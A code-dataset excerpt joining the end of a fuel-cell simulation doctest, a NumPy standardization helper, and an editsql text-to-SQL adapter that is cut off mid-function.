FC Power : 0.5139579100323552 W
FC Voltage : 5.1395791003235525 V
Loss : 0.18576727978992955 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.1010420899676448 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 3.899435456560147e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.6293798842665886
FC Power : 0.9818326194558784 W
FC Voltage : 4.909163097279392 V
Loss : 0.23185017288443285 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.24816738054412169 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 5.853018266659147e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120471438396443
FC Power : 1.4321903165847678 W
FC Voltage : 4.7739677219492265 V
Loss : 0.25888894042333943 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41280968341523216 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 7.809186891953766e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997124668722417
FC Power : 1.8711028966413943 W
FC Voltage : 4.677757241603485 V
Loss : 0.27813072895256186 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.588897103358606 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 9.76794818682758e-05 V
Eta Ohmic : 0.0008785557847524419 V
FC Efficiency : 0.5901164085980564
FC Power : 2.30145399353242 W
FC Voltage : 4.60290798706484 V
Loss : 0.2931002723075654 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735460064675803 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00011729309032954864 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.5822525519832258
FC Power : 2.724941943281497 W
FC Voltage : 4.541569905469162 V
Loss : 0.30536758106117423 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650580567185031 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.00013693276339445145 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755840434599239
FC Power : 3.1426888772911847 W
FC Voltage : 4.489555538987407 V
Loss : 0.3157701467791963 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.1623111227088154 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00015659857042988755 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.569790429225178
FC Power : 3.555492278365111 W
FC Voltage : 4.4443653479563885 V
Loss : 0.324807877394268 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645077216348895 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.0001762905810800498 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.5646650099463304
FC Power : 3.96394836982324 W
FC Voltage : 4.404387077581378 V
Loss : 0.3328032238653337 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5710516301767605 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.0001960088652678871 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600666527156857
FC Power : 4.368519891182348 W
FC Voltage : 4.368519891182348 V
Loss : 0.3399763535283976 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.781480108817652 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.00021575349319660598 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.55589469312397
FC Power : 4.769576467003663 W
FC Voltage : 4.335978606366966 V
Loss : 0.3464843028619262 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9954235329963377 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00023552453535116493 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520748042471996
FC Power : 5.1674201677537885 W
FC Voltage : 4.306183473128157 V
Loss : 0.3524430218673324 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212579832246212 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002553220624997795 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.5485505413555333
FC Power : 5.562302489345107 W
FC Voltage : 4.27869422257316 V
Loss : 0.3579405643231677 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.432697510654893 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00027514614569545357 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452780290261753
FC Power : 5.954436076965834 W
FC Voltage : 4.253168626404167 V
Loss : 0.36304537588899266 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6555639230341663 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.0002949968562774962 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422224856637728
FC Power : 6.344003082266143 W
FC Voltage : 4.229335388177429 V
Loss : 0.3678117158535559 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.8809969177338575 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003148742658730733 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.5393558719759229
FC Power : 6.731161282259518 W
FC Voltage : 4.206975801412199 V
Loss : 0.37228332551300575 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1088387177404826 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.0003347784463987542 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366552535984287
FC Power : 7.116048662715165 W
FC Voltage : 4.185910978067744 V
Loss : 0.3764959824754877 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.338951337284836 W
###########
I : 1.8
E : 6.068389351849069 V
Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.0003547094700620668 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5341016324451575
FC Power : 7.498786919530012 W
FC Voltage : 4.165992733072229 V
Loss : 0.380479323755368 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5712130804699886 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.0003746674093630815 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316790944492106
FC Power : 7.879484179737301 W
FC Voltage : 4.147096936703843 V
Loss : 0.38425817529700723 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8055158202626993 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.00039465233709598025 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293741761651032
FC Power : 8.25823714817561 W
FC Voltage : 4.129118574087805 V
Loss : 0.387853540075361 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.041762851824391 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00041466432635066115 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271753860695316
FC Power : 8.635132823818928 W
FC Voltage : 4.111968011342347 V
Loss : 0.3912833448667819 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.279867176181073 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.0004347034505143372 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250728373249665
FC Power : 9.010249888496427 W
FC Voltage : 4.095568131134739 V
Loss : 0.39456301313781456 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.519750111503576 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.00045476978327314626 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230579622427114
FC Power : 9.383659842634243 W
FC Voltage : 4.079852105493149 V
Loss : 0.397705910482824 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761340157365757 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.00047486339861378836 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5211232875604884
FC Power : 9.755427943132343 W
FC Voltage : 4.06476164297181 V
Loss : 0.40072369519096346 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.004572056867657 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.000494984370825149 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192622556245563
FC Power : 10.12561398467885 W
FC Voltage : 4.05024559387154 V
Loss : 0.4036265972020676 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.249386015321152 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005151327744999589 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174690806642298
FC Power : 10.494272955870581 W
FC Voltage : 4.036258829180992 V
Loss : 0.40642364231840483 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.495727044129421 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005353086845364485 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157386322058496
FC Power : 10.861455594255196 W
FC Voltage : 4.022761331205627 V
Loss : 0.40912283407888206 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.7435444057448075 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.000555512176140013 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140663396997094
FC Power : 11.227208859041653 W
FC Voltage : 4.0097174496577335 V
Loss : 0.41173130254104057 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.992791140958347 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0005757433248249061 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124481138904448
FC Power : 11.591576336201861 W
FC Voltage : 3.997095288345469 V
Loss : 0.4142554269432475 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.24342366379814 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0005960022064159204 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108802815228812
FC Power : 11.95459858763542 W
FC Voltage : 3.9848661958784737 V
Loss : 0.41670093756357396 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.49540141236458 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006162888970501038 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093595307581349
FC Power : 12.316313453731704 W
FC Voltage : 3.9730043399134525 V
Loss : 0.4190730008706778 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.748686546268298 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006366034731784721 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.507882865258588
FC Power : 12.676756316854359 W
FC Voltage : 3.9614863490169867 V
Loss : 0.4213762911512418 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.003243683145644 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0006569460115677318 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064475653403494
FC Power : 13.035960331860592 W
FC Voltage : 3.950291009654725 V
Loss : 0.42361505111213504 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259039668139408 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0006773165893020328 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050511549266622
FC Power : 13.393956628655083 W
FC Voltage : 3.9393990084279658 V
Loss : 0.4257931434330969 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516043371344917 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0006977152837847073 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.5036913732928463
FC Power : 13.750774490894704 W
FC Voltage : 3.9287927116842014 V
Loss : 0.42791409484462756 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.774225509105296 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.0007181421727400468 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023661507925354
FC Power : 14.106441514254398 W
FC Voltage : 3.918455976181777 V
Loss : 0.4299811339950573 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.033558485745605 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007385973342150736 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.50107358791043
FC Power : 14.460983747095012 W
FC Voltage : 3.9083739857013544 V
Loss : 0.4319972241282524 V
PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29401625290499 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0007590808465813247 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.49981193710908595
FC Power : 14.814425815913308 W
FC Voltage : 3.8985331094508706 V
Loss : 0.43396509140262446 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.555574184086693 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0007795927885366656 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49857958703411753
FC Power : 15.166791037577857 W
FC Voltage : 3.888920778866117 V
Loss : 0.4358872495310143 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.818208962422144 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.724941943281497
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.541569905469162
>>> Padulles_Amphlett_Data["EFF"][5]
0.5822525519832258
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650580567185031
>>> Padulles_Amphlett_Data["VE"][5]
4.553525621759973
>>> Padulles_Amphlett_Data["V0"]
4.698326931114575
>>> Padulles_Amphlett_Data["K"]
-0.24133551559100302
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 1.1361117401857817e-07 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 2.301179808139826e-06 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 4.6654999364844955e-06 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
| 1.992188 | 2 |
mlld_functions.py | mdastro/My_Package | 0 | 12797518 | import numpy as np
"""
MLLD_functions: a collection of general-purpose helper functions that I use regularly.
"""
class MLLD_functions:
def standardization(self, variable):
"""
:param variable: the array with the variables you wish to standardize
:return: standardized array
"""
var_average = np.average(variable)
var_std = np.std(variable)
new_variable = []
for i in range(variable.size):
new_variable_i = (variable[i] - var_average)/var_std
new_variable.append(new_variable_i)
self.new_variable = np.array(new_variable)
return self.new_variable
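    # Minimal usage sketch (values are illustrative):
    #
    #   x = np.array([1.0, 2.0, 3.0])
    #   z = MLLD_functions().standardization(x)   # zero mean, unit variance
    #
    # Note: the loop above is equivalent to the vectorized expression
    # (variable - np.average(variable)) / np.std(variable).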
| 3.5625 | 4 |
nlidbTranslator/api/adapters/editsql/editsql_adapter.py | DataManagementLab/univerSQL | 0 | 12797519 | import random
import time
from pathlib import Path
import numpy as np
import json
import torch
from editsql.data_util import atis_batch
from editsql.data_util.atis_data import ATISDataset
from editsql.data_util.interaction import load_function
from editsql.model import model, utils_bert
from editsql.model.schema_interaction_model import SchemaInteractionATISModel
from editsql.postprocess_eval import postprocess_one
from editsql.preprocess import read_database_schema
from editsql.model.bert import tokenization as tokenization
from editsql.model.bert.modeling import BertConfig, BertModel
from adapters.editsql import parse_args_spider, parse_args_sparc
from adapters.editsql.constants import *
from api import setup_util
from api.paths import DB_SCHEMAS_FILE
class EditsqlAdapter:
"""
Uses the functionality of editsql to translate arbitrary questions into sql
"""
def __init__(self, model="spider"):
if model == "sparc":
params = parse_args_sparc.interpret_args()
else:
params = parse_args_spider.interpret_args()
# create the dataset and model
data = ATISDataset(params)
self.model = self.load_model(params, data)
_, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={})
# function used for loading of interaction in raw state
self.int_load_function = load_function(params,
data.entities_dictionary,
data.anonymizer,
database_schema=self.database_schemas)
def load_model(self, params, data):
"""
Loads the editsql translation model
Args:
params: the parsed arguments
data: the ATISDataset
Returns:
the loaded SchemaInteractionATISModel
"""
model = SchemaInteractionATISModel(
params,
data.input_vocabulary,
data.output_vocabulary,
data.output_vocabulary_schema,
data.anonymizer if params.anonymize and params.anonymization_scoring else None)
model.load_state_dict(torch.load(params.save_file,map_location='cpu'))
print("Loaded model from file " + params.save_file)
model.eval()
return model
def prepare_interaction(self, nl_questions, db_id, prev_predictions):
"""
Creates an InteractionItem that contains the natural language question and the database id
Args:
nl_questions: the natural language questions
db_id: the database that acts as context
prev_predictions: the previous predictions
Returns:
an InteractionItem that contains the natural language question and the database id
"""
# establish the structure of an interaction in raw state
example = dict()
example["final"] = dict()
example["interaction"] = []
# fill the general fields
example["id"] = "dummy id"
example["scenario"] = ""
example["interaction_id"] = 42
# fill the content fields
example["database_id"] = db_id
prev_predictions.append("dummy sql query")
for i, nl_q in enumerate(nl_questions):
sql_int = [(prev_predictions[i].split(), [])]
example["interaction"].append({"utterance": nl_q, "sql": sql_int})
example["final"]["utterance"] = nl_questions[-1]
example["final"]["sql"] = "query to be predicted"
# transform the raw interaction to an InteractionItem
obj, _ = self.int_load_function(example)
interaction = atis_batch.InteractionItem(obj)
return interaction
def translate(self, nl_question, db_id):
"""
Translate a single natural language question into sql
Args:
nl_question: the natural language question
db_id: the database that acts as context
Returns:
the sql prediction
"""
# preprocess
nl_questions = [nl_question]
interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[])
prediction = self.predict(interaction)
return self.post_process(prediction, db_id)
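    # Hedged usage sketch (assumes the editsql checkpoints and schema files that
    # parse_args_spider points to are in place; "concert_singer" is a hypothetical
    # Spider database id used only for illustration):
    #
    #   adapter = EditsqlAdapter(model="spider")
    #   sql = adapter.translate("How many singers do we have?", "concert_singer")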
def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions):
"""
Predict the sql for the next utterance in an interaction
Args:
nl_question: the natural language question
db_id: the database that acts as context
prev_nl_questions: the previous questions or an empty list
prev_predictions: the previous predictions or an empty list
Returns:
the sql prediction
"""
# preprocess
nl_questions = prev_nl_questions + [nl_question]
interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions)
prediction = self.predict(interaction)
return self.post_process(prediction, db_id)
def predict(self, interaction):
prediction = self.model.predict_with_predicted_queries(interaction, 1000)
pred_tokens_raw = prediction[-1][0]
pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol
pred_str = " ".join(pred_tokens)
return pred_str
def post_process(self, prediction, db_id):
schema = self.database_schemas[db_id]
post_processed = postprocess_one(prediction, schema)
return post_processed
# ------------ Evaluation -----------------
def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False):
"""
Evaluate the translation output of EditsqlAdapter.
By default the prediction results of standalone editsql act as the reference.
The use_gold_query switch enables comparison with the gold queries from spider
Args:
amount: the amount of samples to use
randomness: randomly choose samples
show_all: write all samples, not only those with errors
use_gold_query: comparison with the gold queries from spider instead of the prediction results of standalone editsql
"""
# load the prediction results of standalone editsql
with open(EVAL_REFERENCE_FILE) as infile:
references = json.load(infile)
if not amount:
# let amount default to _all_ examples from the file
amount = len(references)
# determine the instances to test on
if randomness:
sample_indices = random.sample(range(len(references)), k=amount)
else:
sample_indices = range(amount)
comparisons = []
num_errors = 0
start = time.time()
for i in sample_indices:
db_id = references[i]["database_id"]
in_seq_raw = references[i]["input_seq"]
in_seq = " ".join(in_seq_raw)
schema = self.database_schemas[db_id]
dev_prediction_raw = references[i]["flat_prediction"]
dev_prediction = " ".join(dev_prediction_raw)
dev_prediction = postprocess_one(dev_prediction, schema)
translation = self.translate(in_seq, db_id)
gold = " ".join(references[i]["gold_query"])
gold = postprocess_one(gold, schema)
# normalize and prevent numbering from distorting the results
gold_norm = ''.join("0" if c.isdigit() else c.lower() for c in gold)
dev_pred_norm = ''.join("0" if c.isdigit() else c.lower() for c in dev_prediction)
translation_norm = ''.join("0" if c.isdigit() else c.lower() for c in translation)
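            # Illustrative effect of the normalization above:
            #   "SELECT name FROM T1 LIMIT 3" -> "select name from t0 limit 0"
            # so differing literals and alias numbering no longer count as errors.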
if use_gold_query:
is_error = translation_norm != gold_norm
else:
is_error = translation_norm != dev_pred_norm
if is_error:
num_errors += 1
if is_error or show_all:
comparison = dict()
comparison["identifier"] = references[i]["identifier"]
comparison["is_equal"] = not is_error
comparison["input_seq"] = in_seq
comparison["prediction"] = {}
if use_gold_query:
comparison["prediction"]["gold "] = gold
else:
comparison["prediction"]["editsql "] = dev_prediction
comparison["prediction"]["translation"] = translation
comparisons.append(comparison)
end = time.time()
duration = end - start
time_per_item = duration / amount
num_correct = amount - num_errors
accuracy = num_correct * 100 / amount
eval_output = dict()
eval_output["time per item"] = time_per_item
eval_output["# items"] = amount
eval_output["% equal"] = accuracy
if show_all:
eval_output["content"] = comparisons
else:
eval_output["diff"] = comparisons
write_json_log_results(eval_output, CURRENT_DIR / "evaluation/results")
# ------------ Batch processing -----------------
@classmethod
def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR):
"""
Read the list of dicts with values for nl_question and db_id from the input file
and save the translations to a file in the output directory
Args:
input_file: path of file with list of dicts with values for nl_question and db_id
output_dir: path of dir where the translations are saved
"""
edi_adap = EditsqlAdapter()
with open(input_file) as f:
requests = json.load(f)
for i, request in enumerate(requests):
request["sql"] = edi_adap.translate(request["nl_question"], request["db_id"])
write_json_log_results(requests, output_dir)
def write_json_log_results(content, directory):
path = Path(directory)
filename = time.strftime("%Y_%m_%d-%H_%M_%S") + ".json"
with open(str(path / filename), 'w') as outfile:
json.dump(content, outfile, indent=4)
# define a modified embeddings loading function that makes use of the preloaded glove
def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params):
glove_embedding_size = 300
# ------- use preloaded glove -----------
glove_embeddings = setup_util.glove_embeddings
# ---------------------------------------
input_embedding_size = glove_embedding_size
def create_word_embeddings(vocab):
vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32)
vocabulary_tokens = vocab.inorder_tokens
glove_oov = 0
para_oov = 0
for token in vocabulary_tokens:
token_id = vocab.token_to_id(token)
if token in glove_embeddings:
vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token]
else:
glove_oov += 1
print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab))
return vocabulary_embeddings
input_vocabulary_embeddings = create_word_embeddings(input_vocabulary)
output_vocabulary_embeddings = create_word_embeddings(output_vocabulary)
output_vocabulary_schema_embeddings = None
if output_vocabulary_schema:
output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema)
return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size
# overwrite the original embeddings loading function with the modified version
model.load_word_embeddings = load_word_embeddings_for_editsql
# define a modified version with absolute path instead of relative path in the first line
def get_bert(params):
BERT_PT_PATH = str(TRANSLATORS_DIR / "editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param")
map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12',
'uL': 'uncased_L-24_H-1024_A-16',
'cS': 'cased_L-12_H-768_A-12',
